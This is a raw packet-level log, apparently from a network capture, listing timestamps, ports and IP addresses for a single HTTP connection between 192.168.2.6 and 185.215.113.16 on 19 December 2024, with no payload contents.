Dec 19, 2024 10:10:22.704065084 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.704731941 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.704750061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.704792976 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.705506086 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.705548048 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.705725908 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.706425905 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.706474066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.707307100 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.707334042 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.707351923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.707377911 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.707390070 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.708143950 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.708184958 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.709073067 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.709090948 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.709135056 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.709199905 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.709971905 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.710016012 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.710338116 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.711004972 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.711060047 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.711195946 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.711349010 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.711828947 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.711966038 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.711990118 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.712027073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.712733030 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.712898016 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.712949991 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.713514090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.713732958 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.713783979 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.714523077 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.714598894 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.714668036 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.715504885 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.715549946 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.715635061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.715993881 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.716294050 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.716356039 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.716403008 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.717116117 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.717300892 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.717344046 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.717930079 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.718022108 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.718067884 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.718847990 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.719007015 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.719055891 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.719754934 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.719800949 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.719980955 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.720160961 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.720613003 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.720653057 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.720805883 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.720845938 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.721529961 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.721574068 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.721739054 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.721779108 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.722475052 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.722517014 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.722590923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.722629070 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.723339081 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.723407030 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.723433971 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.723517895 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.724214077 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.724263906 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.724350929 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.724428892 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.725152969 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.725233078 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.725277901 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.726020098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.726249933 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.726291895 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.727089882 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.727232933 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.727298975 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.728135109 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.728180885 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.728293896 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.728715897 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.729012012 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.729188919 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.729232073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.730427027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.732019901 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.876658916 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.876708031 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.876900911 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.877038956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.877073050 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.877131939 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.877151966 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.877202988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.877824068 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.877857924 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.877906084 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.878446102 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.878602028 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.878653049 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.879455090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.879498005 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.879524946 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.880037069 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.880418062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.880465031 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.880491018 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.880532026 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.881196976 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.881280899 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.881329060 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.882169962 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.882247925 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.882291079 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.882843018 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.882886887 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.882900953 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.883219957 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.883632898 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.883682013 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.883696079 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.883744001 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.884309053 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.884443045 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.884500027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.885200024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.885252953 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.885332108 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.886090040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.886122942 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.886138916 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.886163950 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.886920929 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.887063026 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.887259007 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.888072014 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.888117075 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.888174057 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.888894081 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.889069080 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.889118910 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.889816046 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.889868021 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.889900923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.890911102 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.890959024 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.890986919 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.891707897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.891762018 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.891773939 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.891818047 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.892807007 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.892905951 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.892960072 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.893603086 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.893620968 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.893665075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.894319057 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.894371033 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.894378901 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.895176888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.895229101 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.895258904 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.895915985 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.895967007 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.896080971 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.896126986 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.897100925 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.897167921 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.897243023 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.898194075 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.898277998 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.898330927 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.899172068 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.899224997 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.899236917 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.900062084 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.900110006 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.900121927 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.900168896 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.900834084 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.901001930 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.901052952 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.901746988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.901856899 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.901911020 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.902591944 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.902648926 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.902676105 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.903527975 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.903584957 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.903634071 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.904414892 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.904465914 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.904525042 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.904568911 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.905375957 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.905431986 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.905479908 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.906236887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.906348944 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.906399012 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.907174110 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.907223940 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.907320976 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.907958031 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.908004045 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.908020973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.908782959 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.908838034 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.908904076 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.908951044 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.909588099 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.909733057 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.909785986 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.910324097 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.910495043 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.910545111 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.911225080 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.911273956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.911325932 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.912168026 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.912185907 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.912235022 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.912269115 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.912314892 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.913266897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.913315058 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.913397074 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.913444996 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.914079905 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.914128065 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.914160013 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.914202929 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.915306091 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.915364027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.915400982 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.915450096 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.916286945 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.916352034 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.916395903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.917279005 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.917463064 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.917511940 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.918138027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.918262959 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.918311119 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.918958902 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.919008970 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.919137001 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.919924021 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.919970989 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.920064926 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.920423031 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.920892954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.921045065 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.921092987 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.921592951 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.921690941 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.921740055 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.922342062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.922389030 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.922421932 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.924072027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.070703983 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.070811987 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.070852041 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.070916891 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.070961952 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.071096897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.071156025 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.071944952 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.071974993 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.072007895 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.072026968 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.072680950 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.072731018 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.072819948 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.072866917 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.073724031 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.073771000 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.073818922 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.073865891 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.074641943 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.074690104 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.074748993 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.074794054 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.075472116 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.075522900 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.075555086 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.075598955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.076273918 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.076319933 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.076354027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.076399088 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.077004910 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.077049971 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.077081919 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.077126026 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.077899933 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.077950954 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.077980042 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.078026056 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.078867912 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.078916073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.078949928 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.078994989 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.079698086 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.079746008 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.079766035 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.079808950 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.080482006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.080533981 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.080547094 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.080590010 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.081361055 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.081377983 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.081407070 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.081418037 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.082053900 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.082098007 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.082108974 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.082153082 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.082679033 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.082722902 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.082864046 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:23.082907915 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:23.083458900 CET	80	49881	185.215.113.16	192.168.2.6
